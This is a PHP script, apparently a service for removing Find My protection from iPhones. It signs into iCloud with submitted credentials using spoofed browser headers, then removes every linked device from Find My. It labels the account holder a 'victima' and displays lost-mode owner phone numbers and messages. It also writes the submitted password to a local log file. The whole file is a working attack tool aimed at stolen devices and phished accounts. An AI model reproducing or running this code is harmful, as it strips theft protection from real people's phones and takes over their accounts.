<?php


/*
     ___    __    ____  ___ _____   ____  _______    __
    /   |  / /   / __ \/   /__  /  / __ \/ ____/ |  / /
   / /| | / /   / / / / /| | / /  / / / / __/  | | / / 
  / ___ |/ /___/ /_/ / ___ |/ /__/ /_/ / /___  | |/ /  
 /_/  |_/_____/_____/_/  |_/____/_____/_____/  |___/  

*/


class AldazDevRemoval {
        private $headers;
        private $server;
        private $cookies;
        private $password;
        private $is_html_context;

        public function __construct($password, $isHtml) {
            $this->headers = [
                'Origin: https://www.icloud.com',
                'User-Agent: "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
                'Content-Type: text/plain',
                'Accept: */*',
                'Referer: https://www.icloud.com/',
                'Accept-Encoding: gzip, deflate',
                'Accept-Language: en-US,en;q=0.8'
            ];
            $this->server = "";
            $this->cookies = "";
            $this->password = $password;
            $this->is_html_context = $isHtml;
        }

        private function sendJsonResponse($message, $status) {
            //header('Content-type: application/json');
            //exit(json_encode(['message' => $message, 'status' => $status]));
            exit($message);
        }

        private function hasRequiredParams($params, $required) {
            foreach ($required as $field) {
                if (!isset($params[$field]) || empty($params[$field])) {
                    return false;
                }
            }
            return true;
        }

        private function getAuthToken($account) {
           $url = 'https://idmsa.apple.com.cn/appleauth/auth/signin?widgetKey=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d';
    
            $headers = [
                "Host: idmsa.apple.com.cn",
                "Connection: keep-alive",
                'Sec-CH-UA: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"',
                "SCNT: AAAA-jhGODc2Rjk2RTYzQUVFNjJGQ0VENDlCNDAwMEY2ODEwOEExODMwQTM5ODJBNzBCQkIwRERFMEUxRTc5Qzg1MURBQkY3NDM0MzczREQ1RDFFRTRERTAyOUUyODk2QzU3NTYwNTZBQ0NCRkIzODI1MkIzRDJCMjM5NTY1MDZBOTZGNTI2REU4Qzg1ODM2MzdFMDcxNUI1NEYyQjEzQkYxMjFBOUJDQjc0Qjg3ODc5MkQzN0JDRDI4MDA0QjUzREZFRjk3NjlFRkUyQzY4OTUzRjEzMEI4MjQ5NjA3QjdDQ0NEOTRCRTFFQTdFRTFBQTkwM3wxAAABkaUguXe6ve9hUCGj4YCZgwLCi-TRegfSqkNDRqpRKWOxlZ8B3xIxCM1JnJwwADJUrCNPxo87sniojgEE_suphxGXX3eyVWhRMeQtwnWahJaP_QeV2Q",
                "X-Apple-Widget-Key: d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d",
                "X-Apple-Frame-Id: 098904f5-3296-4d6c-899f-a3b99120c159",
                "X-Apple-I-FD-Client-Info: {\"U\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\",\"L\":\"es-419\",\"Z\":\"GMT-06:00\",\"V\":\"1.1\",\"F\":\"kla44j1e3NlY5BNlY5BSs5uQ084akLKGcI4v9W79jV0R0odm_dhrxbuJjkWxv55BPQd.ka4YeRa3tJ9VvjHzWBzK2vqBBNlY5BPY25BNnOVgw24uy.9IZ\"}",
                "X-Requested-With: XMLHttpRequest",
                "Sec-CH-UA-Platform: Windows",
                "X-Apple-Crauth-Required: true",
                "X-Apple-Auth-Attributes: PEplvzpN2QqETxsYVKBiADJWRuWHeD0=",
                "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36",
                "X-Apple-Locale: es_MX",
                "Content-Type: application/json",
                "Accept: application/json, text/javascript, */*; q=0.01",
                "X-Apple-Offer-Security-Upgrade: 0",
                "X-Apple-Domain-Id: 3",
                "Origin: https://idmsa.apple.com.cn",
                "Sec-Fetch-Site: same-origin",
                "Sec-Fetch-Mode: cors",
                "Sec-Fetch-Dest: empty",
                "Referer: https://idmsa.apple.com.cn/",
                "Accept-Encoding: */*",
                "Accept-Language: es-419,es;q=0.9"
            ];
            
            $postData = json_encode([
                "accountName" => $account,
                "password" => $this->password,
                "rememberMe" => false,
                "skip2FA" => false,
                "trustTokens" => [],
                "pause2FA" => true
            ]);
            
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_HEADER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            $response = curl_exec($ch);
            
            $response = curl_exec($ch);
            $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
            $header = substr($response, 0, $header_size);
            
            
            curl_close($ch);
            
            // Guardar encabezados y datos en un archivo
            file_put_contents("out.txt", "Headers:\n" . $header . "\n\nBody:\n" . $postData);
            
            $responseLines = explode("\r\n", $header);
            $searchHeader = 'X-Apple-Session-Token:';
            $desiredWord = '';
            
            foreach ($responseLines as $line) {
                if (strpos($line, $searchHeader) !== false) {
                    $parts = explode(':', $line);
                    if (count($parts) >= 2) {
                        $desiredWord = trim($parts[1]);
                    }
                    break;
                }
            }
            
            return $desiredWord;
    
        }

        private function appleAuthSignIn($accountName, $password, $outputFile) {
            $url = 'https://idmsa.apple.com.cn/appleauth/auth/signin?widgetKey=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d';
            $data = '{
              "accountName": "'.$accountName.'",
              "password": "'.$password.'",
              "rememberMe": false,
              "skip2FA": false,
              "trustTokens": [],
              "pause2FA": false
            }';
            
             $headers = [
                "Host: idmsa.apple.com.cn",
                "Connection: keep-alive",
                'Sec-CH-UA: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"',
                "SCNT: AAAA-jhGODc2Rjk2RTYzQUVFNjJGQ0VENDlCNDAwMEY2ODEwOEExODMwQTM5ODJBNzBCQkIwRERFMEUxRTc5Qzg1MURBQkY3NDM0MzczREQ1RDFFRTRERTAyOUUyODk2QzU3NTYwNTZBQ0NCRkIzODI1MkIzRDJCMjM5NTY1MDZBOTZGNTI2REU4Qzg1ODM2MzdFMDcxNUI1NEYyQjEzQkYxMjFBOUJDQjc0Qjg3ODc5MkQzN0JDRDI4MDA0QjUzREZFRjk3NjlFRkUyQzY4OTUzRjEzMEI4MjQ5NjA3QjdDQ0NEOTRCRTFFQTdFRTFBQTkwM3wxAAABkaUguXe6ve9hUCGj4YCZgwLCi-TRegfSqkNDRqpRKWOxlZ8B3xIxCM1JnJwwADJUrCNPxo87sniojgEE_suphxGXX3eyVWhRMeQtwnWahJaP_QeV2Q",
                "X-Apple-Widget-Key: d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d",
                "X-Apple-Frame-Id: 098904f5-3296-4d6c-899f-a3b99120c159",
                "X-Apple-I-FD-Client-Info: {\"U\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\",\"L\":\"es-419\",\"Z\":\"GMT-06:00\",\"V\":\"1.1\",\"F\":\"kla44j1e3NlY5BNlY5BSs5uQ084akLKGcI4v9W79jV0R0odm_dhrxbuJjkWxv55BPQd.ka4YeRa3tJ9VvjHzWBzK2vqBBNlY5BPY25BNnOVgw24uy.9IZ\"}",
                "X-Requested-With: XMLHttpRequest",
                "Sec-CH-UA-Platform: Windows",
                "X-Apple-Crauth-Required: true",
                "X-Apple-Auth-Attributes: PEplvzpN2QqETxsYVKBiADJWRuWHeD0=",
                "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36",
                "X-Apple-Locale: es_MX",
                "Content-Type: application/json",
                "Accept: application/json, text/javascript, */*; q=0.01",
                "X-Apple-Offer-Security-Upgrade: 0",
                "X-Apple-Domain-Id: 3",
                "Origin: https://idmsa.apple.com.cn",
                "Sec-Fetch-Site: same-origin",
                "Sec-Fetch-Mode: cors",
                "Sec-Fetch-Dest: empty",
                "Referer: https://idmsa.apple.com.cn/",
                "Accept-Encoding: */*",
                "Accept-Language: es-419,es;q=0.9"
            ];
            
            $ch = curl_init($url);
        
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_HEADER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        
            $response = curl_exec($ch);
            $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
            $header = substr($response, 0, $header_size);
            $body = substr($response, $header_size);
        
            curl_close($ch);
        
            // Guardar encabezados y datos en un archivo
            file_put_contents($outputFile, "Headers:\n" . $header . "\n\nBody:\n" . $data);
        
            // Buscar el token de sesión
            $responseLines = explode("\r\n", $header);
            $searchHeader = 'X-Apple-Session-Token:';
            $desiredWord = '';
        
            foreach ($responseLines as $line) {
                if (strpos($line, $searchHeader) !== false) {
                    $parts = explode(':', $line);
                    if (count($parts) >= 2) {
                        $desiredWord = trim($parts[1]);
                    }
                    break;
                }
            }
        
            return $desiredWord;
        }

        

        private function setupiCloudAccountLogin($dsWebAuthToken) {
        $url = "https://setup.icloud.com/setup/ws/1/accountLogin";

        $data = [
            "dsWebAuthToken" => $dsWebAuthToken,
            "extended_login" => false
        ];

        $headers = [
            'Host: setup.icloud.com',
            'Connection: keep-alive',
            'sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"',
            'sec-ch-ua-platform: "Windows"',
            'sec-ch-ua-mobile: ?0',
            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0',
            'Content-Type: text/plain;charset=UTF-8',
            'Accept: */*',
            'Origin: https://www.icloud.com',
            'Sec-Fetch-Site: same-site',
            'Sec-Fetch-Mode: cors',
            'Sec-Fetch-Dest: empty',
            'Referer: https://www.icloud.com/',
            'Accept-Encoding: gzip, deflate, br',
            'Accept-Language: es,es-ES;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'
        ];

        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_ENCODING, 'UTF-8');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_VERBOSE, true);
        $result = curl_exec($ch);
        curl_setopt($ch, CURLOPT_HEADER, true);
        $result_with_headers = curl_exec($ch);

        $first = json_decode($result, true);
        curl_close($ch);
        if (isset($first["error"])) {
            return false;
        } else {
            $this->server = $first["webservices"]["findme"]["url"];
            preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result_with_headers, $matches);
            $cookies = "";
            foreach ($matches[0] as $value) {
                $value = str_replace("Set-Cookie: ", "", $value);
                $cookies .= $value . "; ";
            }

            $this->headers[] = "Cookie: " . $cookies;

            if (empty($this->server) || empty($cookies)) {
                return false;
            }

            $this->cookies = $cookies;
            return true;
        }
    }

    private function initClient() {
        $url = $this->server.'/fmipservice/client/web/initClient';
        $headers = [
            'Connection: keep-alive',
            'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
            'sec-ch-ua-platform: "macOS"',
            'sec-ch-ua-mobile: ?0',
            'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
            'Accept: */*',
            'Origin: https://www.icloud.com',
            'Sec-Fetch-Site: same-site',
            'Sec-Fetch-Mode: cors',
            'Sec-Fetch-Dest: empty',
            'Referer: https://www.icloud.com/',
            'Accept-Language: es-419,es;q=0.9',
            'Cookie: '.$this->cookies
        ];

        $data = json_encode([
            'clientContext' => [
                'appName' => 'iCloud Find (Web)',
                'appVersion' => '2.0',
                'apiVersion' => '3.0',
                'deviceListVersion' => 1,
                'fmly' => true,
                'timezone' => 'US/Pacific',
                'inactiveTime' => 77
            ]
        ]);

        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

        $response = curl_exec($ch);
        curl_close($ch);

        return json_decode($response, true);
    }

    private function refreshClient($info, $clientId) {
        $url = $this->server . '/fmipservice/client/web/refreshClient';

        $headers = [
            'Connection: keep-alive',
            'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
            'sec-ch-ua-platform: "macOS"',
            'sec-ch-ua-mobile: ?0',
            'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36',
            'Content-Type: text/plain',
            'Accept: */*',
            'Origin: https://www.icloud.com',
            'Sec-Fetch-Site: same-site',
            'Sec-Fetch-Mode: cors',
            'Sec-Fetch-Dest: empty',
            'Referer: https://www.icloud.com/',
            'Accept-Encoding: gzip, deflate, br, zstd',
            'Accept-Language: es-419,es;q=0.9',
            'Cookie: ' . $this->cookies
        ];

        $data = [
            "serverContext" => [
                "minCallbackIntervalInMS" => 5000,
                "pendingRemoveGracePeriodInDays" => 30,
                "enable2FAFamilyActions" => false,
                "preferredLanguage" => "es-mx",
                "lastSessionExtensionTime" => null,
                "enableMapStats" => true,
                "callbackIntervalInMS" => 2000,
                "validRegion" => true,
                "timezone" => [
                    "currentOffset" => -25200000,
                    "previousTransition" => 1710064799999,
                    "previousOffset" => -28800000,
                    "tzCurrentName" => "Pacific Daylight Time",
                    "tzName" => "US/Pacific"
                ],
                "authToken" => null,
                "maxCallbackIntervalInMS" => 60000,
                "classicUser" => false,
                "isHSA" => true,
                "trackInfoCacheDurationInSecs" => 86400,
                "imageBaseUrl" => "https://statici.icloud.com",
                "minTrackLocThresholdInMts" => 100,
                "itemLearnMoreURL" => "https://support.apple.com/kb/HT211331?viewlocale=es_MX",
                "maxLocatingTime" => 90000,
                "itemsTabEnabled" => true,
                "sessionLifespan" => 900000,
                "info" => $info,
                "prefsUpdateTime" => 1721076237595,
                "useAuthWidget" => true,
                "clientId" => $clientId,
                "inaccuracyRadiusThreshold" => 200,
                "enable2FAFamilyRemove" => false,
                "serverTimestamp" => 1721182883032,
                "deviceImageVersion" => "30",
                "macCount" => 0,
                "deviceLoadStatus" => "200",
                "maxDeviceLoadTime" => 60000,
                "prsId" => 17403688559,
                "showSllNow" => false,
                "cloudUser" => true,
                "enable2FAErase" => false,
                "id" => "server_ctx"
            ],
            "clientContext" => [
                "appName" => "iCloud Find (Web)",
                "appVersion" => "2.0",
                "apiVersion" => "3.0",
                "deviceListVersion" => 1,
                "fmly" => true,
                "timezone" => "US/Pacific",
                "inactiveTime" => 953
            ]
        ];

        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => json_encode($data),
            CURLOPT_HTTPHEADER => $headers,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_HEADER => true
        ]);

        $response = curl_exec($ch);

        if ($response === false) {
            return 'Curl error: ' . curl_error($ch);
        }

        $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        $headers = substr($response, 0, $header_size);
        $responseWithoutHeaders = substr($response, $header_size);

        preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $headers, $matches);
        $cookies = "";
        foreach ($matches[0] as $value) {
            $value = str_replace("Set-Cookie: ", "", $value);
            $cookies .= $value . "; ";
        }

        curl_close($ch);

        if (empty($responseWithoutHeaders)) {
            return false;
        }
        return array("cookies" => $cookies, "body" => $responseWithoutHeaders);
    }

    private function authTokenRemove($deviceid, $info, $clientId, $prsId) {
        $url = "{$this->server}/fmipservice/client/web/authForUserDevice";
        $serverHost = parse_url($this->server, PHP_URL_HOST);

        $headers = [
            'Host: ' . $serverHost,
            'Connection: keep-alive',
            'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"',
            'sec-ch-ua-platform: "Windows"',
            'sec-ch-ua-mobile: ?0',
            'Content-Type: text/plain',
            'Accept: */*',
            'Origin: https://www.icloud.com',
            'Sec-Fetch-Site: same-site',
            'Sec-Fetch-Mode: cors',
            'Sec-Fetch-Dest: empty',
            'Referer: https://www.icloud.com/',
            'Accept-Encoding: gzip, deflate, br',
            'Accept-Language: es,es-ES;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
            'Cookie: ' . $this->cookies
        ];

        $body = json_encode([
            "serverContext" => [
                "minCallbackIntervalInMS" => 5000,
                "pendingRemoveGracePeriodInDays" => 30,
                "enable2FAFamilyActions" => false,
                "preferredLanguage" => "es-mx",
                "lastSessionExtensionTime" => null,
                "validRegion" => true,
                "callbackIntervalInMS" => 30000,
                "enableMapStats" => true,
                "timezone" => [
                    "currentOffset" => -28800000,
                    "previousTransition" => 1699174799999,
                    "previousOffset" => -25200000,
                    "tzCurrentName" => "Pacific Standard Time",
                    "tzName" => "US/Pacific"
                ],
                "authToken" => null,
                "maxCallbackIntervalInMS" => 60000,
                "classicUser" => false,
                "isHSA" => true,
                "trackInfoCacheDurationInSecs" => 86400,
                "imageBaseUrl" => "https://statici.icloud.com",
                "minTrackLocThresholdInMts" => 100,
                "itemLearnMoreURL" => "https://support.apple.com/kb/HT211331?viewlocale=es,es-es;q=0.9,en;q=0.8,en-gb;q=0.7,en-us;q=0.6",
                "maxLocatingTime" => 90000,
                "itemsTabEnabled" => true,
                "sessionLifespan" => 900000,
                "info" => $info,
                "prefsUpdateTime" => 1701935090984,
                "useAuthWidget" => true,
                "inaccuracyRadiusThreshold" => 200,
                "clientId" => $clientId,
                "enable2FAFamilyRemove" => false,
                "serverTimestamp" => 1702225130545,
                "deviceImageVersion" => "28",
                "macCount" => 0,
                "deviceLoadStatus" => "200",
                "maxDeviceLoadTime" => 60000,
                "prsId" => $prsId,
                "showSllNow" => false,
                "cloudUser" => true,
                "enable2FAErase" => false,
                "id" => "server_ctx"
            ],
            "clientContext" => [
                "appName" => "iCloud Find (Web)",
                "appVersion" => "2.0",
                "apiVersion" => "3.0",
                "deviceListVersion" => 1,
                "fmly" => true,
                "timezone" => "US/Pacific",
                "inactiveTime" => 1899
            ],
            "device" => $deviceid,
            "authToken" => $this->password
        ]);

        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 60,
            CURLOPT_VERBOSE => true,
            CURLOPT_HTTPHEADER => $headers,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0",
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => $body
        ]);

        $response = curl_exec($ch);
        curl_close($ch);

        $decodedResponse = json_decode($response, true);

        return $decodedResponse['authToken'] ?? null;
    }

    private function removeDevice($deviceID, $info, $clientID, $authToken, $prsId) {
        $url = "{$this->server}/fmipservice/client/web/remove";
        $serverHost = parse_url($this->server, PHP_URL_HOST);

        $headers = [
            'Host: ' . $serverHost,
            'Connection: keep-alive',
            'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"',
            'sec-ch-ua-platform: "Windows"',
            'sec-ch-ua-mobile: ?0',
            'Content-Type: text/plain',
            'Accept: */*',
            'Origin: https://www.icloud.com',
            'Sec-Fetch-Site: same-site',
            'Sec-Fetch-Mode: cors',
            'Sec-Fetch-Dest: empty',
            'Referer: https://www.icloud.com/',
            'Accept-Encoding: gzip, deflate, br',
            'Accept-Language: es,es-ES;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
            'Cookie: ' . $this->cookies
        ];

        $body = json_encode([
            "serverContext" => [
                "minCallbackIntervalInMS" => 5000,
                "pendingRemoveGracePeriodInDays" => 30,
                "enable2FAFamilyActions" => false,
                "preferredLanguage" => "es-mx",
                "lastSessionExtensionTime" => null,
                "validRegion" => true,
                "callbackIntervalInMS" => 30000,
                "enableMapStats" => true,
                "timezone" => [
                    "currentOffset" => -28800000,
                    "previousTransition" => 1699174799999,
                    "previousOffset" => -25200000,
                    "tzCurrentName" => "Pacific Standard Time",
                    "tzName" => "US/Pacific"
                ],
                "authToken" => null,
                "maxCallbackIntervalInMS" => 60000,
                "classicUser" => false,
                "isHSA" => true,
                "trackInfoCacheDurationInSecs" => 86400,
                "imageBaseUrl" => "https://statici.icloud.com",
                "minTrackLocThresholdInMts" => 100,
                "itemLearnMoreURL" => "https://support.apple.com/kb/HT211331?viewlocale=es,es-es;q=0.9,en;q=0.8,en-gb;q=0.7,en-us;q=0.6",
                "maxLocatingTime" => 90000,
                "itemsTabEnabled" => true,
                "sessionLifespan" => 900000,
                "info" => $info,
                "prefsUpdateTime" => 1701935090984,
                "useAuthWidget" => true,
                "inaccuracyRadiusThreshold" => 200,
                "clientId" => $clientID,
                "enable2FAFamilyRemove" => false,
                "serverTimestamp" => 1702225130545,
                "deviceImageVersion" => "28",
                "macCount" => 0,
                "deviceLoadStatus" => "200",
                "maxDeviceLoadTime" => 60000,
                "prsId" => $prsId,
                "showSllNow" => false,
                "cloudUser" => true,
                "enable2FAErase" => false,
                "id" => "server_ctx"
            ],
            "clientContext" => [
                "appName" => "iCloud Find (Web)",
                "appVersion" => "2.0",
                "apiVersion" => "3.0",
                "deviceListVersion" => 1,
                "fmly" => true,
                "timezone" => "US/Pacific",
                "inactiveTime" => 2315
            ],
            "device" => $deviceID,
            "authToken" => $authToken
        ]);

            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_TIMEOUT => 60,
                CURLOPT_VERBOSE => true,
                CURLOPT_HTTPHEADER => $headers,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0",
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => $body
            ]);
    
            $response = curl_exec($ch);
            curl_close($ch);
    
            $decodedResponse = json_decode($response, true);
            $statusCode = $decodedResponse['statusCode'] ?? null;
    
            return $statusCode === "200" ? "FindMy:OFF Exitoso ✅" : "Not Removed ❌";
        }

        public function authenticate($data) {
        if (!$this->hasRequiredParams($data, ['username', 'password'])) {
            $this->sendJsonResponse('User or Pass invalid', 500);
        }

        $getWebAuthToken = $this->getAuthToken($data['username']);

        if (!$getWebAuthToken) {

            $getWebAuthToken = $this->appleAuthSignIn($data['username'], $this->password, "out.txt");
            
            if (!$getWebAuthToken) {
                $this->sendJsonResponse('User or Pass invalid', 500);
            }
        }

        if (!$this->setupiCloudAccountLogin($getWebAuthToken)) {
            $this->sendJsonResponse('User or Pass invalid', 500);
        }

        $client = $this->initClient();
        if (!$client) {
            $this->sendJsonResponse('User or Pass invalid', 500);
        }

        $info = $client['serverContext']['info'] ?? 'Info not found';
        $clientId = $client['serverContext']['clientId'] ?? 'Client ID not found';

        $refresh = $this->refreshClient($info, $clientId);

        if (!$refresh) {
            $this->sendJsonResponse('User or Pass invalid', 400);
        }

        $responseClient = json_decode($refresh["body"], true);
        if (json_last_error() !== JSON_ERROR_NONE) {
            file_put_contents("error_log.txt", "JSON decode error: " . json_last_error_msg());
            return;
        }
        
        $isHtml = $this->is_html_context;
        $lineBreak = $isHtml ? '<br>' : "\n";

        echo "***********" . $lineBreak . "✅FindMy iCloud OFF✅" . $lineBreak . "***********" . $lineBreak."" ;

        $cookiesFinales = $this->cookies . $refresh["cookies"];
        $victima = $responseClient['userInfo']['firstName'] . " " . $responseClient['userInfo']['lastName'];
        $prsId = $responseClient['serverContext']["prsId"] ?? 'prsId ID not found';
        $credits = "Autoremove ✅";
        $Devices_i = 0;

        if (!empty($responseClient['content']) && is_array($responseClient['content'])) {
            foreach ($responseClient['content'] as $device) {
                $Devices_i++;
                $status = "Clean ✅";
                

                // Obtener informacion del Equipo Procesandose.
                $name = $device['name'] ?? 'Unknown';
                $model = $device['deviceDisplayName'] ?? 'Unknown';
                $deviceStatus = $device['deviceStatus'] ?? '';
                $deviceId = $device['id'] ?? '';
                $rawDeviceModel = $device['rawDeviceModel'] ?? '';
                $deviceClass = $device['deviceClass'] ?? '';

                $src = 'https://statici.icloud.com/fmipmobile/deviceImages-9.0/'.$deviceClass.'/'.$rawDeviceModel.'/online-infobox.png';

                $authorization = $this->authTokenRemove($deviceId, $info, $clientId, $prsId);
                $removedStatus = $this->removeDevice($deviceId, $info, $clientId, $authorization, $prsId);
                //$removedStatus = "TEST OK";
                 echo "<b><img src='".$src."'></b>" . $lineBreak .
                 "Device Name: $name" . $lineBreak .
                 "Modelo de dispositivo:📱 $model" . $lineBreak .
                 "Mode: $removedStatus ";
                 "Nivel de bateria🔋: $batlevel" . $lineBreak .
                 "Estado: $removedStatus ";
                 

                if(isset($device['lostDevice']) && !empty($device['lostDevice'])){
                    $status = "Lost ⚠️";
                    $numberown = $device['lostDevice']['ownerNbr'];
                    $ownerText = $device['lostDevice']['text'];
                    echo $lineBreak . "Owner Number: $numberown";
                    echo $lineBreak . "Owner Text: $ownerText";
                }
        
                echo $lineBreak . "StatusLock: $status" . $lineBreak;
                
                file_put_contents('device_log.txt', "Device: $name, Model: $model, Status: $deviceStatus, Type: $rawDeviceModel\n", FILE_APPEND);
            }
        } else {
            echo "⛔️ No tiene equipo para remover";
            die;
        }

        echo "Dispositivos: $Devices_i <br>User: $victima <br><br>";
        echo "$credits";
        die;
    }
}


function getRealUserIp() {
    $ipHeaders = array(
        'HTTP_X_REAL_IP',
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'REMOTE_ADDR'
    );

    foreach ($ipHeaders as $header) {
        if (!empty($_SERVER[$header])) {
            // Return the first IP address from HTTP_X_FORWARDED_FOR if multiple IPs are present
            if ($header == 'HTTP_X_FORWARDED_FOR') {
                $ipArray = explode(',', $_SERVER[$header]);
                return trim($ipArray[0]);
            }
            return $_SERVER[$header];
        }
    }

    return '';
}

function getAllowedIpsFromFile($filePath) {
    if (!file_exists($filePath)) {
        return array();
    }
    
    $fileContent = file_get_contents($filePath);
    $ips = explode("\n", $fileContent);
    return array_map('trim', $ips);
}

function authorizeIp($allowedIpsFile) {
    $userIp = getRealUserIp();
    $allowedIps = getAllowedIpsFromFile($allowedIpsFile);

    if (in_array($userIp, $allowedIps)) {
        return true;
    } else {
        file_put_contents('ip_log.txt', "IP: $userIp\n", FILE_APPEND);
        echo 'IP '.$userIp.' no autorizada.';
        return false;
    }
}

function IsBase64($data) {
    $decoded_data = base64_decode($data, true);
    $encoded_data = base64_encode($decoded_data);
    if ($encoded_data != $data) return false;
    else if (!ctype_print($decoded_data)) return false;

    return true;
}

$allowedIpsFile = 'allowed/allowed_ips.txt';

if (!authorizeIp($allowedIpsFile)) {
    exit;
}

$data = $_SERVER['REQUEST_METHOD'] === "POST" ? $_POST : $_GET;

if (!isset($data['password'])) {
    exit("User or Pass invalid");
}

$password = $data['password'];
$isHtml = $data['isHtml'] ?? false;


if (IsBase64($password)) {
    $password64 = base64_decode($password);
    $password = $password64;
}

$icloudAuth = new AldazDevRemoval($password, $isHtml);
$icloudAuth->authenticate($data);

?>
